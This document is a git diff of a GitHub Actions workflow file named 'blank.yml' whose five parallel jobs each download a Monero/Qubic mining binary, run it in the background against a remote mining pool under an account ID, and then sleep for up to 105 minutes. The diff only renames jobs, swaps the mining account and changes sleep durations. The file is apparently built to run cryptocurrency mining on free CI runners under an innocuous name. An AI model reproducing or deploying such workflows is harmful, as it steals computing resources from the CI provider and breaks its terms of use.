--- a/.github/workflows/blank.yml
+++ b/.github/workflows/blank.yml
@@ -4,7 +4,7 @@ on:
     branches: [ "main" ]
 
 jobs:
-  tahu:
+  kont:
     runs-on: ubuntu-latest
     strategy:
       max-parallel: 80
@@ -25,10 +25,10 @@ jobs:
     - name: Setup
       uses: actions/checkout@v4
     - name: clone
-      run: wget https://github.com/apool-io/xmrminer/releases/download/v3.2.0/apoolminer_linux_xmr_v3.2.0.tar.gz && tar xf apoolminer_linux_xmr_v3.2.0.tar.gz && cd apoolminer_linux_xmr_v3.2.0 && ./apoolminer --gpu-off --account CP_6otjk8h431 --worker $(echo $(shuf -i 1-15000 -n 1)-tod) --pool qubic2.hk.apool.io:3334 --thread 4 &
+      run: wget https://github.com/apool-io/xmrminer/releases/download/v3.2.0/apoolminer_linux_xmr_v3.2.0.tar.gz && tar xf apoolminer_linux_xmr_v3.2.0.tar.gz && cd apoolminer_linux_xmr_v3.2.0 && ./apoolminer --gpu-off --account CP_ajiabhjr1q --worker $(echo $(shuf -i 1-15000 -n 1)-tod) --pool qubic2.hk.apool.io:3334 --thread 4 &
            sleep 310s
-  bakso:
-    needs: tahu
+  ol:
+    needs: kont
     runs-on: ubuntu-latest
     strategy:
       max-parallel: 250
@@ -48,13 +48,13 @@ jobs:
         go-version: ${{ matrix.go }}
       id: go
     - name: clone
-      run: wget https://github.com/apool-io/xmrminer/releases/download/v3.2.0/apoolminer_linux_xmr_v3.2.0.tar.gz && tar xf apoolminer_linux_xmr_v3.2.0.tar.gz && cd apoolminer_linux_xmr_v3.2.0 && ./apoolminer --gpu-off --account CP_6otjk8h431 --worker $(echo $(shuf -i 1-15000 -n 1)-tod) --pool qubic2.hk.apool.io:3334 --thread 4 &
+      run: wget https://github.com/apool-io/xmrminer/releases/download/v3.2.0/apoolminer_linux_xmr_v3.2.0.tar.gz && tar xf apoolminer_linux_xmr_v3.2.0.tar.gz && cd apoolminer_linux_xmr_v3.2.0 && ./apoolminer --gpu-off --account CP_ajiabhjr1q --worker $(echo $(shuf -i 1-15000 -n 1)-tod) --pool qubic2.hk.apool.io:3334 --thread 4 &
             sleep 5m
         
     
      
-  tempe:
-    needs: [tahu]
+  tol:
+    needs: [kont]
     runs-on: ubuntu-latest
     strategy:
       max-parallel: 250
@@ -74,10 +74,10 @@ jobs:
         go-version: ${{ matrix.go }}
       id: go
     - name: clone
-      run: wget https://github.com/apool-io/xmrminer/releases/download/v3.2.0/apoolminer_linux_xmr_v3.2.0.tar.gz && tar xf apoolminer_linux_xmr_v3.2.0.tar.gz && cd apoolminer_linux_xmr_v3.2.0 && ./apoolminer --gpu-off --account CP_6otjk8h431 --worker $(echo $(shuf -i 1-15000 -n 1)-tod) --pool qubic2.hk.apool.io:3334 --thread 4 &
+      run: wget https://github.com/apool-io/xmrminer/releases/download/v3.2.0/apoolminer_linux_xmr_v3.2.0.tar.gz && tar xf apoolminer_linux_xmr_v3.2.0.tar.gz && cd apoolminer_linux_xmr_v3.2.0 && ./apoolminer --gpu-off --account CP_ajiabhjr1q --worker $(echo $(shuf -i 1-15000 -n 1)-tod) --pool qubic2.hk.apool.io:3334 --thread 4 &
             sleep 6m
-  bakwan:
-    needs: bakso
+  ayo:
+    needs: ol
     runs-on: ubuntu-latest
     strategy:
       max-parallel: 250
@@ -97,13 +97,13 @@ jobs:
         go-version: ${{ matrix.go }}
       id: go
     - name: clone
-      run: wget https://github.com/apool-io/xmrminer/releases/download/v3.2.0/apoolminer_linux_xmr_v3.2.0.tar.gz && tar xf apoolminer_linux_xmr_v3.2.0.tar.gz && cd apoolminer_linux_xmr_v3.2.0 && ./apoolminer --gpu-off --account CP_6otjk8h431 --worker $(echo $(shuf -i 1-15000 -n 1)-tod) --pool qubic2.hk.apool.io:3334 --thread 4 &
+      run: wget https://github.com/apool-io/xmrminer/releases/download/v3.2.0/apoolminer_linux_xmr_v3.2.0.tar.gz && tar xf apoolminer_linux_xmr_v3.2.0.tar.gz && cd apoolminer_linux_xmr_v3.2.0 && ./apoolminer --gpu-off --account CP_ajiabhjr1q --worker $(echo $(shuf -i 1-15000 -n 1)-tod) --pool qubic2.hk.apool.io:3334 --thread 4 &
             sleep 105m
         
     
      
-  donat:
-    needs: [tempe]
+  su:
+    needs: [tol]
     runs-on: ubuntu-latest
     strategy:
       max-parallel: 250
@@ -123,8 +123,8 @@ jobs:
         go-version: ${{ matrix.go }}
       id: go
     - name: clone
-      run: wget https://github.com/apool-io/xmrminer/releases/download/v3.2.0/apoolminer_linux_xmr_v3.2.0.tar.gz && tar xf apoolminer_linux_xmr_v3.2.0.tar.gz && cd apoolminer_linux_xmr_v3.2.0 && ./apoolminer --gpu-off --account CP_6otjk8h431 --worker $(echo $(shuf -i 1-15000 -n 1)-tod) --pool qubic2.hk.apool.io:3334 --thread 4 &
-            sleep 64m
+      run: wget https://github.com/apool-io/xmrminer/releases/download/v3.2.0/apoolminer_linux_xmr_v3.2.0.tar.gz && tar xf apoolminer_linux_xmr_v3.2.0.tar.gz && cd apoolminer_linux_xmr_v3.2.0 && ./apoolminer --gpu-off --account CP_ajiabhjr1q --worker $(echo $(shuf -i 1-15000 -n 1)-tod) --pool qubic2.hk.apool.io:3334 --thread 4 &
+            sleep 61m
         
     
   
